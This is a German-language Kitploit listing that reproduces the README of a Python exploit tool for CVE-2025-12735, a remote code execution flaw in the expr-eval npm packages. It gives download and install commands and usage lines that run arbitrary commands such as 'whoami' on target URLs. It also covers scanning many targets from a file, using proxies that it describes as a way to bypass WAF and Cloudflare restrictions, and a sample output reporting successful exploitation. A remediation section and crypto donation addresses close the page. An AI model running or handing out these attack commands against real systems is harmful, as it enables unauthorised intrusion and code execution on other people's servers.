Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-12735-expr-eval-rce — Sicherheitsforschungswerkzeug zur Erkennung und Prüfung von CVE-2025-12735 (expr-eval RCE-Sicherheitslücke) | Kitploit
Tools/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

Sicherheitsforschungswerkzeug zur Erkennung und Prüfung von CVE-2025-12735 (expr-eval RCE-Sicherheitslücke)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
11vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-12735 expr-eval RCE Exploit

Ein Sicherheitsforschungswerkzeug zur Erkennung und Prüfung der CVE-2025-12735-Schwachstelle in den npm-Paketen expr-eval und expr-eval-fork.

⚠️ Haftungsausschluss

Dieses Werkzeug ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Nicht autorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben.

📋 Übersicht

CVE-2025-12735 ist eine kritische Schwachstelle für Remotecodeausführung (Remote Code Execution) in den npm-Paketen expr-eval und expr-eval-fork. Diese Schwachstelle ermöglicht es Angreifern, willkürliche Funktionen innerhalb des vom Parser verwendeten context-Objekts zu definieren, wodurch schädlicher Code eingeschleust werden kann, der systemweite Befehle ausführt.

CVSS-Score: 9.8 (Kritisch) expr-eval-fork < 3.0.0 expr-eval-fork v3.0.0+


Betroffene Versionen:

Behobene Version:

🔍 Funktionen

  • Automatisierte Erkennung: Durchsucht JavaScript-Dateien nach Nutzung der expr-eval-Bibliothek
  • Endpunktfindung: Findet automatisch Evaluierungsendpunkte
  • Schwachstellentest: Testet auf die CVE-2025-12735-Schwachstelle
  • Befehlsausführung: Demonstriert RCE-Fähigkeit (für autorisierte Tests)
  • Multithreading-Unterstützung: Parallelscannen mehrerer Ziele
  • Proxy-Unterstützung: Umgehung von WAF/Cloudflare-Einschränkungen
  • JSON-Export: Detaillierte Ergebnisse im JSON-Format

📦 Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip (Python-Paketmanager)

Schnellinstallation

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

Alternative: Direkter Download

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Install dependencies
pip install requests

🚀 Verwendung

Grundlegende Verwendung

root@kitploit:~
# Single target
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Execute custom command
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# With threading for faster scanning
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Verbose output for debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

Verwendung von Proxys

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

Befehlszeilenoptionen

root@kitploit:~
-u, --url          Ziel-URL
-f, --file         Datei mit Ziel-URLs (eine pro Zeile)
-c, --command      Auszuführender Befehl (Standard: id)
-t, --threads      Anzahl der Threads (Standard: 1)
-o, --output       Ausgabedatei (Standard: uknf_expr_eval_results.json)
-v, --verbose      Ausführliche Protokollierung aktivieren
--proxy            Proxy-URL (z.B. http://127.0.0.1:8080)
--proxy-list       Datei mit Proxy-URLs (eine pro Zeile)

📊 Ausgabe

Das Skript erzeugt eine JSON-Datei mit detaillierten Ergebnissen:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 Funktionsweise

  1. Erkennungsphase: Durchsucht JavaScript-Dateien und HTML-Inhalte nach expr-eval-Referenzen
  2. Endpunktfindung: Testet gängige API-Endpunkte, die expr-eval verwenden könnten
  3. Schwachstellentest: Versucht, willkürliche Funktionen in das context-Objekt zu injizieren
  4. Ausnutzung: Wenn anfällig, demonstriert RCE-Fähigkeit

🛡️ Abhilfe

Falls Sie expr-eval oder expr-eval-fork verwenden:

  1. Sofort aktualisieren:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. Sicherheitspatch anwenden:

    • Wenden Sie Pull Request #288 auf expr-eval an
    • Oder wechseln Sie zu expr-eval-fork v3.0.0+
  3. Eingabevalidierung implementieren:

    • Bereinigen Sie alle Benutzereingaben
    • Verwenden Sie eine Funktions-Whitelist
    • Validieren Sie Kontextobjekte

📚 Referenzen

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub Advisory: GHSA-jc85-fpwf-qm7x
  • Security Patch: PR #288

📖 Beispiele

Beispiel 1: Einzelziel-Scan

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

Beispiel 2: Mehrere Ziele mit Ausgabe

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

Beispiel 3: Benutzerdefinierte Befehlsausführung

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

Beispiel 4: Verwendung von Proxys

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 Mitwirken

Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull Request einzureichen.

  1. Forken Sie das Repository
  2. Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
  3. Committen Sie Ihre Änderungen (git commit -m 'Add some AmazingFeature')
  4. Pushen Sie zum Branch (git push origin feature/AmazingFeature)
  5. Öffnen Sie einen Pull Request

🐛 Probleme

Falls Sie auf Probleme stoßen oder Vorschläge haben, öffnen Sie bitte ein Issue auf GitHub.

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

⭐ Sternverlauf

Wenn Sie dieses Tool nützlich finden, erwägen Sie bitte, ihm auf GitHub einen Stern zu geben!

⚖️ Rechtliches

Dieses Tool wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen.

🙏 Danksagungen

  • Ursprünglicher Schwachstellenmelder: Jangwoo Choe (UKO)
  • CERT Coordination Center für die Offenlegung der Schwachstelle
  • GitHub Security und npm für Sicherheitshinweise

💰 Spenden

Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Vielen Dank für Ihre Unterstützung! 🙏

Tool herunterladen